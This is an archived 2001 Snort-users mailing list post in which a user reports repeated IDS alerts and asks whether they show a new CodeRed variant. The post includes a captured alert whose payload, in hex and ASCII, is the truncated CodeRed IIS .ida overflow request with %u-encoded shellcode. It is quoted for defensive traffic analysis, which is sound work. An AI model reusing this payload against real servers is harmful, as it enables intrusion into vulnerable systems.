Snort mailing list archives
A new variation of CodeRed???????????
From: "John Davey" <john () davey net au>
Date: Fri, 17 Aug 2001 00:09:23 +0930
Does any one know anything about this or has seen it before? I just got hit 70 times in 6 minutes. Regards John. Signatures with 207.42.183.71 as a Source CID:470 [**] WEB-IIS ISAPI .ida attempt [**] 2001-08-16 15:48:18 207.42.183.71:60385 -> 172.20.0.1:80 TCP TTL:49 TOS:0x0 ID:31943 IPLen: DgmLen:634 HLen:5 CSumIP:0x9828 ***AP*** Seq:0x9C096E5E Ack:0xEC3440 Win:0x3EBC CSumTCP:0x5329 Payload (Hex): 4745 5420 2F64 6566 6175 6C74 2E69 6461 3F58 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5800 0000 0000 0000 0000 0000 0000 0000 C303 0000 0078 00FA 2025 7539 3039 3025 7536 3835 3825 7563 6264 3325 7537 3830 3125 7539 3039 3025 7536 3835 3825 7563 6264 3325 7537 3830 3125 7539 3039 3025 7539 3039 3025 7538 3139 3025 7530 3063 3325 7530 3030 3325 7538 6230 3025 7535 3331 6225 7535 3366 6625 7530 3037 3825 7530 3030 3025 7530 303D 6120 4854 5450 2F31 2E30 0D0A 436F 6E74 656E 742D 7479 7065 3A20 7465 7874 2F78 6D6C 0D0A 436F 6E74 656E 742D 6C65 6E67 7468 3A20 3333 3739 0D0A 436C 6965 6E74 2D69 703A 2036 342E 3736 2E31 3030 2E31 3535 0D0A 436F 6E6E 6563 7469 6F6E 3A20 6B65 6570 2D Payload (ASCII): GET /default.ida?XXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX X................... .x.. %u9090%u6858%uc bd3%u7801%u9090%u685 8%ucbd3%u7801%u9090% u9090%u8190%u00c3%u0 003%u8b00%u531b%u53f f%u0078%u0000%u00=a HTTP/1.0..Content-ty pe: text/xml..Conten t-length: 3379..Clie nt-ip: 64.76.100.155 ..Connection: keep- _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: http://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- A new variation of CodeRed??????????? John Davey (Aug 16)
- <Possible follow-ups>
- Re: A new variation of CodeRed??????????? Neil Dickey (Aug 16)
- RE: A new variation of CodeRed??????????? John Davey (Aug 16)
- MD5 sums for each CodeRed version (was "A new variation of CodeRed???????????") Stephen W. Thompson (Aug 16)
- RE: A new variation of CodeRed??????????? John Davey (Aug 16)
- RE: A new variation of CodeRed??????????? Neil Dickey (Aug 16)